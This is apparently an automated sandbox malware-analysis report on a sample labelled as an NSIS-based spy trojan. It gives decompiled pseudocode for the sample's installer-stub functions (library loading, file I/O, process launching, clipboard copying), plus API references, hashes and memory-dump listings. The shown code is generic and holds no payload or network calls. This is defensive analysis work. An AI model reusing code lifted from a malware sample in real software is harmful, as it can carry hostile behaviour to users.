Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID:
API String ID: 3712363035-0
Opcode ID: a96f74c6d97d8fddc601bdb2e7485f3ed7604f934fc57424aef617628e035306
Instruction ID: 1fa2a79eb519949bf7d30246b9e4481379e3d274eb9e55713eae969c2627164f
Opcode Fuzzy Hash: a96f74c6d97d8fddc601bdb2e7485f3ed7604f934fc57424aef617628e035306
Instruction Fuzzy Hash: 6AE0B6F4A00209BFEB00DFA4EE09F7B7AACEB44604F408525BD54F2191D7B9A8148A78

Uniqueness

Uniqueness Score: -1.00%

Function 00406A3B Relevance: 3.0, APIs: 2, Instructions: 22
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406A3B(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a410);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a410));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a414));
				}
				_t5 = E004069CB(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}

0x00406a43
0x00406a46
0x00406a4d
0x00406a55
0x00406a61
0x00000000
0x00406a68
0x00406a58
0x00406a5f
0x00000000
0x00406a70
0x00000000

APIs

GetModuleHandleA.KERNEL32(?,00000020,?,00403756,0000000B), ref: 00406A4D
GetProcAddress.KERNEL32(00000000,?), ref: 00406A68

Part of subcall function 004069CB: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069E2
Part of subcall function 004069CB: wsprintfW.USER32 ref: 00406A1D
Part of subcall function 004069CB: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A31

Memory Dump Source

Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
Instruction ID: 8bc6c373ae4a51b79335f269ef4a09a4b84a1385f2c3991dd3566e210a560b2e
Opcode Fuzzy Hash: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
Instruction Fuzzy Hash: 56E0867660421066D610A6755D48D3773B89BC6710306843EF556F2040DB38DC359A6D

Uniqueness

Uniqueness Score: -1.00%

Function 0040615E Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0040615E(WCHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesW(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}

0x00406162
0x0040616f
0x00406184
0x0040618a

APIs

GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe,80000000,00000003), ref: 00406162
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406184

Memory Dump Source

Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
Instruction ID: 0e1b57c135d9ed337dcee0f1630d7a3ffd6699826ab823f4ff8c6da5104765b0
Opcode Fuzzy Hash: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
Instruction Fuzzy Hash: DCD09E71254201AFEF0D8F20DF16F2E7AA2EB94B04F11952CB682940E1DAB15C15AB19

Uniqueness

Uniqueness Score: -1.00%

Function 00406139 Relevance: 3.0, APIs: 2, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406139(WCHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesW(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesW(_a4, _t3 & 0x000000fe); // executed
				}
				return _t7;
			}

0x0040613e
0x00406144
0x00406149
0x00406152
0x00406152
0x0040615b

APIs

GetFileAttributesW.KERNELBASE(?,?,00405D3E,?,?,00000000,00405F14,?,?,?,?), ref: 0040613E
SetFileAttributesW.KERNELBASE(?,00000000), ref: 00406152

Memory Dump Source

Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
Instruction ID: 4d59290e3aa44cd58c99826dd52d8cee581d87a9a88888807f370448835cb7c6
Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
Instruction Fuzzy Hash: C2D0C972504130ABC2502728AE0889ABB55EB642717014A35F9A5A62B0CB304C628A98

Uniqueness

Uniqueness Score: -1.00%

Function 00405C1C Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405C1C(WCHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryW(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}

0x00405c22
0x00405c2a
0x00000000
0x00405c30
0x00000000

APIs

CreateDirectoryW.KERNELBASE(?,00000000,00403639,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 00405C22
GetLastError.KERNEL32 ref: 00405C30

Memory Dump Source

Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
Instruction ID: 9b4f5430b3bbe22f75525a6a8288bb62ac5ef9e6fdb3d88c50eeb6a92616e2bf
Opcode Fuzzy Hash: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
Instruction Fuzzy Hash: 1EC04C71218609AEE7705B209F0DB177A949B50741F11443A6686F40A0DA788455D92D

Uniqueness

Uniqueness Score: -1.00%

Function 00406210 Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406210(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x00406214
0x00406224
0x0040622c
0x00000000
0x00406233
0x00000000
0x00406235

APIs

WriteFile.KERNELBASE(?,00000000,00000000,00000000,00000000,0078E728,0078B730,0040357F,0078B730,0078E728,0jy,00793730,00004000,?,00000000,004033A9), ref: 00406224

Memory Dump Source

Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction ID: f08cceda346ec9350f11c22fcf513fe3bc01c5f1c17db0892cf19a12a1b56e8c
Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction Fuzzy Hash: 95E08C3220026AABCF10AE698C00AEB3B6CFB05360F01447AFE56E7040D334E83087A5

Uniqueness

Uniqueness Score: -1.00%

Function 004061E1 Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004061E1(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x004061e5
0x004061f5
0x004061fd
0x00000000
0x00406204
0x00000000
0x00406206

APIs

ReadFile.KERNELBASE(?,00000000,00000000,00000000,00000000,00793730,0078B730,004035FB,?,?,004034FF,00793730,00004000,?,00000000,004033A9), ref: 004061F5

Memory Dump Source

Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
Instruction ID: a9904075eeec40e7e939a2dde13f9046a7e38eb284923ea40542f090f2fca858
Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
Instruction Fuzzy Hash: 66E08632500219ABDF106E519C04AEB375CFB01350F01487AFD22E2151E231E87187A8

Uniqueness

Uniqueness Score: -1.00%

Function 004035FE Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004035FE(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}

0x0040360c
0x00403612

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032FC,?), ref: 0040360C

Memory Dump Source

Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D

Uniqueness

Uniqueness Score: -1.00%

Function 00401FA4 Relevance: 1.3, APIs: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00401FA4() {
				void* _t9;
				intOrPtr _t13;
				void* _t15;
				void* _t17;
				void* _t20;
				void* _t22;

				_t19 = E00402DA6(_t15);
				E004056D0(0xffffffeb, _t7);
				_t9 = E00405C51(_t19); // executed
				_t20 = _t9;
				if(_t20 == _t15) {
					 *((intOrPtr*)(_t22 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t22 - 0x28)) != _t15) {
						_t13 = E00406AE6(_t17, _t20); // executed
						if( *((intOrPtr*)(_t22 - 0x2c)) < _t15) {
							if(_t13 != _t15) {
								 *((intOrPtr*)(_t22 - 4)) = 1;
							}
						} else {
							E004065B5( *((intOrPtr*)(_t22 - 0xc)), _t13);
						}
					}
					_push(_t20);
					CloseHandle();
				}
				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t22 - 4));
				return 0;
			}

0x00401faa
0x00401faf
0x00401fb5
0x00401fba
0x00401fbe
0x0040292e
0x00401fc4
0x00401fc7
0x00401fca
0x00401fd2
0x00401fe1
0x00401fe3
0x00401fe3
0x00401fd4
0x00401fd8
0x00401fd8
0x00401fd2
0x00401fea
0x00401feb
0x00401feb
0x00402c2d
0x00402c39

APIs

Part of subcall function 004056D0: lstrlenW.KERNEL32(007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405708
Part of subcall function 004056D0: lstrlenW.KERNEL32(004030A8,007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405718
Part of subcall function 004056D0: lstrcatW.KERNEL32(007A0F68,004030A8), ref: 0040572B
Part of subcall function 004056D0: SetWindowTextW.USER32(007A0F68,007A0F68), ref: 0040573D
Part of subcall function 004056D0: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405763
Part of subcall function 004056D0: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040577D
Part of subcall function 004056D0: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040578B

Part of subcall function 00405C51: CreateProcessW.KERNELBASE ref: 00405C7A
Part of subcall function 00405C51: CloseHandle.KERNEL32(?), ref: 00405C87

CloseHandle.KERNEL32(?,?,?,?,?,?,?), ref: 00401FEB

Part of subcall function 00406AE6: WaitForSingleObject.KERNEL32(?,00000064,00000000,00000000,?,?,00401F9F,?,?,?,?,?,?), ref: 00406AF7
Part of subcall function 00406AE6: GetExitCodeProcess.KERNELBASE(?,?), ref: 00406B19

Part of subcall function 004065B5: wsprintfW.USER32 ref: 004065C2

Memory Dump Source

Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
String ID:
API String ID: 2972824698-0
Opcode ID: efa72648fad6ec3f2344eb43542f960c9bac8b1359726ced394ac23af3d9461d
Instruction ID: 2caf0deb9ca9c7db124b05ee4a2ba4d84aa6555efd1b03c2e112275a9e200b7a
Opcode Fuzzy Hash: efa72648fad6ec3f2344eb43542f960c9bac8b1359726ced394ac23af3d9461d
Instruction Fuzzy Hash: FCF09671904111E7DB11BBA59A88E9E76A4DF01318F25443BE102B21D0D77C4D419A6E

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040580F Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284
windowclipboardmemoryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E0040580F(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t94;
				long _t95;
				int _t100;
				void* _t108;
				intOrPtr _t130;
				struct HWND__* _t134;
				int _t156;
				int _t159;
				struct HMENU__* _t164;
				struct HWND__* _t168;
				struct HWND__* _t169;
				int _t171;
				void* _t172;
				short* _t173;
				short* _t175;
				int _t177;

				_t169 =  *0x7a7a84;
				_t156 = 0;
				_v8 = _t169;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E004057A3, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					if(_a8 != 0x111) {
						L17:
						_t171 = 1;
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b) {
								goto L20;
							}
							_t94 = _v8;
							if(_a12 != _t94) {
								goto L20;
							}
							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
							_a8 = _t95;
							if(_t95 <= _t156) {
								L36:
								return 0;
							}
							_t164 = CreatePopupMenu();
							AppendMenuW(_t164, _t156, _t171, E004066AB(_t156, _t164, _t171, _t156, 0xffffffe1));
							_t100 = _a16;
							_t159 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v28);
								_t100 = _v28.left;
								_t159 = _v28.top;
							}
							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
								_v60 = _t156;
								_v48 = 0x7a1f88;
								_v44 = 0x1000;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
								} while (_a4 != _t156);
								OpenClipboard(_t156);
								EmptyClipboard();
								_t108 = GlobalAlloc(0x42, _t171 + _t171);
								_a4 = _t108;
								_t172 = GlobalLock(_t108);
								do {
									_v48 = _t172;
									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
									 *_t173 = 0xd;
									_t175 = _t173 + 2;
									 *_t175 = 0xa;
									_t172 = _t175 + 2;
									_t156 = _t156 + 1;
								} while (_t156 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(0xd, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						if( *0x7a7a6c == _t156) {
							ShowWindow( *0x7a8aa8, 8);
							if( *0x7a8b2c == _t156) {
								E004056D0( *((intOrPtr*)( *0x7a0f60 + 0x34)), _t156);
							}
							E004045A3(_t171);
							goto L25;
						}
						 *0x7a0758 = 2;
						E004045A3(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E00404631(_a8, _a12, _a16);
						}
						ShowWindow( *0x7a7a70, _t156);
						ShowWindow(_t169, 8);
						E004045FF(_t169);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_t177 = 2;
				_v60 = _t177;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t130 =  *0x7a8ab0;
				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
				_a12 =  *((intOrPtr*)(_t130 + 0x60));
				 *0x7a7a70 = GetDlgItem(_a4, 0x403);
				 *0x7a7a68 = GetDlgItem(_a4, 0x3ee);
				_t134 = GetDlgItem(_a4, 0x3f8);
				 *0x7a7a84 = _t134;
				_v8 = _t134;
				E004045FF( *0x7a7a70);
				 *0x7a7a74 = E00404F58(4);
				 *0x7a7a8c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(_t177);
				SendMessageW(_v8, 0x1061, 0,  &_v60);
				SendMessageW(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageW(_v8, 0x1001, 0, _a8);
					SendMessageW(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t156) {
					SendMessageW(_v8, 0x1024, _t156, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E004045CA(_a4);
				if(( *0x7a8ab8 & 0x00000003) != 0) {
					ShowWindow( *0x7a7a70, _t156);
					if(( *0x7a8ab8 & 0x00000002) != 0) {
						 *0x7a7a70 = _t156;
					} else {
						ShowWindow(_v8, 8);
					}
					E004045FF( *0x7a7a68);
				}
				_t168 = GetDlgItem(_a4, 0x3ec);
				SendMessageW(_t168, 0x401, _t156, 0x75300000);
				if(( *0x7a8ab8 & 0x00000004) != 0) {
					SendMessageW(_t168, 0x409, _t156, _a12);
					SendMessageW(_t168, 0x2001, _t156, _a8);
				}
				goto L36;
			}

0x00405817
0x0040581d
0x00405827
0x0040582a
0x004059c0
0x004059e4
0x004059e4
0x004059f7
0x00405a15
0x00405a17
0x00405a1f
0x00405a75
0x00405a79
0x00000000
0x00000000
0x00405a7b
0x00405a81
0x00000000
0x00000000
0x00405a8b
0x00405a93
0x00405a96
0x00405b98
0x00000000
0x00405b98
0x00405aa5
0x00405ab0
0x00405ab9
0x00405ac4
0x00405ac7
0x00405ad0
0x00405ad6
0x00405ad9
0x00405ad9
0x00405af1
0x00405afa
0x00405afd
0x00405b04
0x00405b0b
0x00405b13
0x00405b13
0x00405b2a
0x00405b2a
0x00405b31
0x00405b37
0x00405b43
0x00405b4a
0x00405b53
0x00405b55
0x00405b58
0x00405b67
0x00405b6a
0x00405b70
0x00405b71
0x00405b77
0x00405b78
0x00405b79
0x00405b81
0x00405b8c
0x00405b92
0x00405b92
0x00000000
0x00405af1
0x00405a27
0x00405a57
0x00405a5f
0x00405a6a
0x00405a6a
0x00405a70
0x00000000
0x00405a70
0x00405a2b
0x00405a35
0x00000000
0x004059f9
0x004059ff
0x00405a3a
0x00000000
0x00405a43
0x00405a08
0x00405a0d
0x00405a10
0x00000000
0x00405a10
0x004059f7
0x00405830
0x00405834
0x0040583c
0x00405840
0x00405843
